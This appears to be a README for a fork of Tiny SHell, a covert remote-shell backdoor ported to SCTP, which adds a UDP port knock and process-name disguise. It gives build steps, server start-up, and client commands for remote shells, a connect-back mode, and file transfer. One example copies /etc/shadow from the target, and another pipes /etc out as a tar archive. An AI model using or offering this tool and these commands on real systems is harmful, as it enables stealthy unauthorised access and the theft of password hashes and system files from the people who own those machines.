
TinySHell port to SCTP

Primary LanguageC


##What's new

  • add udp knock, expose tcp port after right knock
  • add process name confusion

based on https://github.com/infodox/tsh-sctp

modified by md5_salt


  • Compiling Tiny SHell

    Run "make ", where can be any one of these: linux, freebsd, openbsd, netbsd, cygwin, sunos, irix, hpux, osf

  • How to use the server

    It can be useful to set $HOME and the file creation mask before starting the server:

      % umask 077; HOME=/var/tmp ./tshd
  • How to use the client

    Make sure tshd is running on the remote host. You can:

    • start a shell:


    • execute a command:

      ./tsh "uname -a"

    • transfer files:

      ./tsh get /etc/shadow . ./tsh put vmlinuz /boot

    Note: if the server runs in connect-back mode, replace the remote machine hostname with "cb".

  • About multiple file transfers

    At the moment, Tiny SHell does not support scp-like multiple and/or recursive file transfers. You can work around this bug by simply making a tar archive and transferring it. Example:

    ./tsh host "stty raw; tar -cf - /etc 2>/dev/null" | tar -xvf -

    On some brain-dead systems (actually, IRIX and HP-UX), Ctrl-C and other control keys do not work correctly. Fix it with:

      % stty intr "^C" erase "^H" eof